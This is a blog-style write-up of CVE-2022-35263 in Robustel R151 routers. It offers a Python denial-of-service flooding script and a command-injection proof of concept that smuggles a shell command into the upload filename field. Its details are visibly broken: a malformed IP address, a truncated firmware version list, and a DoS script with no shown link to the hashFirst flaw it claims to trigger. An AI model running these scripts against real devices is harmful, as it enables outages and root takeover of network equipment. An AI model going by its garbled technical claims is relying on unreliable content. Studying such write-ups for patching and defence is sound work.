CVE-2022-35263 affects the Robustel R151 cellular router, a commonly used device in Internet of Things (IoT) deployments and industrial networking. This vulnerability covers both a denial of service (DoS) in the device’s web server and a command injection issue in its authentication API.
Affected firmware versions:
3.3.
In this post, we’ll look at what causes these vulnerabilities, show sample code that demonstrates the exploit, and explain how attackers can use them.
> DISCLAIMER: All content here is for educational use only. Don’t use this information to attack devices you do not own or have permission to test.
1. Denial of Service via hashFirst Functionality
Component: Web server
Vulnerable Function: hashFirst
Impact: Attackers can make the web server crash, causing network downtime and loss of connectivity.
Technical Analysis
The Robustel R151 web server uses a custom hash table to process incoming HTTP requests. There’s a logic bug in the hashFirst implementation, which does not properly handle certain malformed requests. If an attacker sends a sequence of specially-crafted requests, it can cause a crash (DoS).
Example Exploit
If you send multiple malformed or oversized HTTP POST requests to the device’s web server, you can trigger the flaw.
Python Example
import requests
device_ip = '192.168..1' # replace with your router’s IP
url = f'http://{device_ip}/action/import_file/';
# This payload causes trouble with the router's hashFirst logic:
malformed = "A" * 10000
for i in range(10):
try:
requests.post(url, data=malformed)
print(f"Sent packet #{i+1}")
except Exception as e:
print("Target web server appears to be down")
break
After running this script several times, the web interface on the router will freeze or crash, making management impossible until a reboot.
### 2. Command Injection in /action/import_file/ API
Component: /action/import_file/ API
Impact: Remote attackers can run commands as root, leading to full compromise.
Technical Analysis
The import file API does not sanitize input data. If an attacker crafts a POST request that includes shell metacharacters or command sequences, the input is passed to shell handlers by the backend. This results in arbitrary command execution.
Example Exploit
Below is a proof-of-concept using Python to trigger command injection. Imagine the attacker wants to create a new file on the device.
Python Exploit
import requests
device_ip = '192.168..1' # replace with target router’s IP
url = f'http://{device_ip}/action/import_file/';
# Injects a new file creation command through the filename parameter
payload = {
'filename': 'backup.cfg; touch /tmp/hacked.txt; #',
'file': ('backup.cfg', b"dummy content")
}
# We need to send as multipart/form-data since an upload is expected
response = requests.post(url, files=payload)
print("Response status:", response.status_code)
If successful, /tmp/hacked.txt will be created on the device, demonstrating arbitrary command execution.
Mitigations
- Upgrade firmware: Robustel has released patches in newer firmware. Always update to the latest version.
References
- CVE Record
- IoT Inspector Blog: Robustel R151 Vulnerabilities
- Robustel Security Updates
Conclusion
CVE-2022-35263 is a serious vulnerability in Robustel R151 routers. Anyone with access to the management port can cause a denial of service or take over the device due to poor input filtering. Devices deployed in critical networks should be patched ASAP and restricted from untrusted access.
Always secure your IoT devices and keep firmware up to date!
---
If you found this post useful, please share it to help others secure their networks.
Timeline
Published on: 10/25/2022 17:15:00 UTC
Last modified on: 10/26/2022 03:56:00 UTC